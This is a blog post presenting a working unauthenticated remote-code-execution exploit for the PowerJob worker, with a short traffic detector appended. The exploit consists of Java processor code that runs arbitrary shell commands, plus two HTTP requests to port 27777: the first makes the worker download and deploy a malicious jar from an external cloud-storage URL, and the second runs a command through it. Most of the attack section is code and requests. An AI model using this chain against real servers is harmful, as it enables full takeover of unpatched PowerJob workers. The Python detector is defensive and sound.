The PowerJob worker has an unauthorized remote code execution vulnerability.
First, we build a jar with the following code:

@Component
public class SimpleProcessor implements BasicProcessor {

    @Override
    public ProcessResult process(TaskContext taskContext) {
        OmsLogger omsLogger = taskContext.getOmsLogger();
        omsLogger.info("SimpleProcessor start to process, current JobParams is {}.", taskContext.getJobParams());
        String command = taskContext.getInstanceParams();
        ProcessBuilder builder = new ProcessBuilder();
        Process process = null;
        try {
            if (SystemUtils.IS_OS_WINDOWS) {
                process = builder.command("cmd.exe", "/c", command).redirectErrorStream(true).start();
            } else {
                process = builder.command("sh", "-c", command).redirectErrorStream(true).start();
            }
            InputStream inputStream = process.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
            String line;
            while ((line = reader.readLine()) != null) {
                omsLogger.info(line);
            }
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        return new ProcessResult(true, "simple processor finished with params=" + command);
    }
}

Package the jar with the Maven package command. I now have a packaged malicious jar file:
java11 payload
java8 payload
Then send a request to the worker's port 27777:

POST /worker/deployContainer HTTP/1.1
content-type: application/json
Content-Length: 163
host: 172.16.27.29:27777

{"containerId":90,"containerName":"rce-demo","version":"bbb","downloadURL":"https://wiz-1251828685.cos.ap-shanghai.myqcloud.com/photos/4736658854a4f045e0ebfc72732ec779.jar"}

Now we can execute code with this request:

POST /worker/runJob HTTP/1.1
content-type: application/json
Content-Length: 550
host: 172.16.27.29:27777

{"allWorkerAddress":["172.16.27.29:27777"],"maxWorkerCount":0,"jobId":46,"wfInstanceId":null,"instanceId":520642210811609408,"executeType":"BROADCAST","processorType":"EXTERNAL","processorInfo":"90#org.example.demo.SimpleProcessor","instanceTimeoutMS":0,"jobParams":"","instanceParams":"open /System/Applications/Calculator.app","threadConcurrency":5,"taskRetryNum":1,"timeExpressionType":"API","timeExpression":null,"maxInstanceNum":0,"alarmConfig":"{\"alertThreshold\":0,\"silenceWindowLen\":0,\"statisticWindowLen\":0}","logConfig":"{\"type\":1}"}

After a few seconds, the command will be executed.
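
For detection, the two requests above can be correlated in traffic seen on the worker port. The following is an added example, not code from the original post or from PowerJob: it assumes a hypothetical record format of (source IP, path, JSON body) and site-specific allow-lists, and the sample traffic is constructed.

```python
import json
from urllib.parse import urlparse

# Assumed site values (not from the post): the real PowerJob server and jar host.
TRUSTED_SERVERS = {"192.0.2.10"}
ALLOWED_JAR_HOSTS = {"192.0.2.10"}

def scan(records):
    """records: iterable of (src_ip, path, json_body) seen on the worker port."""
    flagged = set()   # container IDs deployed by a suspicious request
    alerts = []
    for src, path, body in records:
        if path not in ("/worker/deployContainer", "/worker/runJob"):
            continue
        try:
            data = json.loads(body)
        except (TypeError, ValueError):
            data = None
        if not isinstance(data, dict):
            alerts.append((src, path, "unparseable body"))
            continue
        untrusted = src not in TRUSTED_SERVERS
        if path == "/worker/deployContainer":
            host = urlparse(str(data.get("downloadURL") or "")).hostname
            if untrusted or host not in ALLOWED_JAR_HOSTS:
                flagged.add(str(data.get("containerId")))
                alerts.append((src, path, f"container {data.get('containerId')} jar from {host}"))
        else:
            # processorInfo reads as "<containerId>#<class>" in the post's runJob request
            cid = str(data.get("processorInfo") or "").split("#", 1)[0]
            external = data.get("processorType") == "EXTERNAL"
            if untrusted or (external and cid in flagged):
                alerts.append((src, path, f"runJob on container {cid}, external={external}"))
    return alerts

# Constructed sample traffic (documentation addresses, not real captures).
SAMPLE = [
    ("192.0.2.10", "/worker/deployContainer",
     '{"containerId":7,"downloadURL":"http://192.0.2.10/container/7.jar"}'),
    ("198.51.100.23", "/worker/deployContainer",
     '{"containerId":90,"downloadURL":"https://files.example.net/x.jar"}'),
    ("198.51.100.23", "/worker/runJob",
     '{"processorType":"EXTERNAL","processorInfo":"90#org.example.demo.SimpleProcessor"}'),
    ("192.0.2.10", "/worker/runJob",
     '{"processorType":"EXTERNAL","processorInfo":"7#com.example.Nightly"}'),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

Only the deploy and run requests from the untrusted source are reported; the same pair from the trusted server with an approved jar host passes.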

Author: TestNet
Copyright notice: Unless otherwise stated, all articles on this site are licensed under CC BY-NC-SA 4.0. Please credit TestNet when reposting.